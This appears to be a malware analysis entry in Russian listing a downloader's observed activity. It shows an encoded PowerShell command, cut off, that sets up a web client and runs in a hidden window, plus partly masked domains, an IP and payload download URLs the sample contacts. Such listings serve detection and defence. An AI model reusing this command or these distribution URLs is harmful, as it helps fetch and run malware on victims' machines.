Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqADMAMwA5ADQAXwA9ACgAJwB3AF8AJwArACcANwA2AF8AMgAnACsAJwBfAF8AJwApADsAJABkAF8AMwA4ADAAOAAxADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARwBfADQANAA0ADgAPQAoAC...
- 'eu#####dusedtires.com':80
- 'eu#####dusedtires.com':443
- 'gu###joeris.com':80
- 'gu###joeris.com':443
- 'cc##ike.cn':80
- '13#.#9.182.250':80
- http://eu#####dusedtires.com/8CkavCZyr
- http://gu###joeris.com/0Jq9Kb2Uwa
- http://www.cc##ike.cn/5KabHk6
- http://13#.#9.182.250/rLUeg6v
- 'eu#####dusedtires.com':443
- 'gu###joeris.com':443
- DNS ASK eu#####dusedtires.com
- DNS ASK gu###joeris.com
- DNS ASK gu######ahandball.com.br
- DNS ASK cc##ike.cn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqADMAMwA5ADQAXwA9ACgAJwB3AF8AJwArACcANwA2AF8AMgAnACsAJwBfAF8AJwApADsAJABkAF8AMwA4ADAAOAAxADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARwBfADQANAA0ADgAPQAoAC...' (со скрытым окном)